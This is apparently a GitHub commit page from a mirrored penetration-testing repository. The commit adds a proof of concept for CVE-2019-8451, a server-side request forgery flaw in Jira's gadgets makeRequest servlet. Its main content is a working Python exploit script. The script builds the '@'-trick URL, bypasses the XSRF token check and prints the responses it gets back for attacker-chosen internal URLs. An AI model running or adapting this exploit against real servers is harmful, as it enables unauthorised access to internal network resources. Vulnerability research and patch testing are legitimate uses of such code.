Mirrors_BOOKS/Penetration_Testing_POC
1
0
Fork 0
mirror of https://github.com/Mr-xn/Penetration_Testing_POC.git synced 2026-05-09 22:37:49 +08:00
Code Issues Actions 10 Packages Projects Releases Wiki Activity

add CVE-2019-8451

Browse Source
This commit is contained in:
mr-xn
2019-09-26 19:53:58 +08:00
parent fddedfc700
commit 43e577f84e
5 changed files with 89 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
CVE-2019-8451/CVE-2019-8451.jpg
BIN
View File
Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 523 KiB

CVE-2019-8451/CVE-2019-8451.py
+41
View File
@@ -0,0 +1,41 @@
import requests
import sys
# http://www.jas502n.com:8080/plugins/servlet/gadgets/makeRequest?url=http://www.jas502n.com:8080@www.baidu.com/
def ssrf_poc(url, ssrf_url):
if url[-1] == '/':
url = url[:-1]
else:
url = url
vuln_url = url + "/plugins/servlet/gadgets/makeRequest?url=" + url + '@' + ssrf_url
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
"Accept": "*/*",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding": "gzip, deflate",
"X-Atlassian-Token": "no-check",
"Connection": "close"
}
r = requests.get(url=vuln_url, headers=headers)
if r.status_code == 200 and 'set-cookie' in r.content:
print "\n>>>>Send poc Success!\n"
print 'X-AUSERNAME= %s' % r.headers.get('X-AUSERNAME')
print "\n>>>>vuln_url= " + vuln_url + '\n'
print r.content
else:
print "No Vuln Exit!"
if __name__ == "__main__":
while True:
print
ssrf_url = raw_input(">>>>SSRF URL: ")
url = "http://www.jas502n.com:8080"
ssrf_poc(url, ssrf_url)
CVE-2019-8451/JRASERVER-69793.jpg
BIN
View File
Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 453 KiB

CVE-2019-8451/README.md
+48
View File
File diff suppressed because one or more lines are too long
CVE-2019-8451/burpsuite.jpg
BIN
View File
Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 697 KiB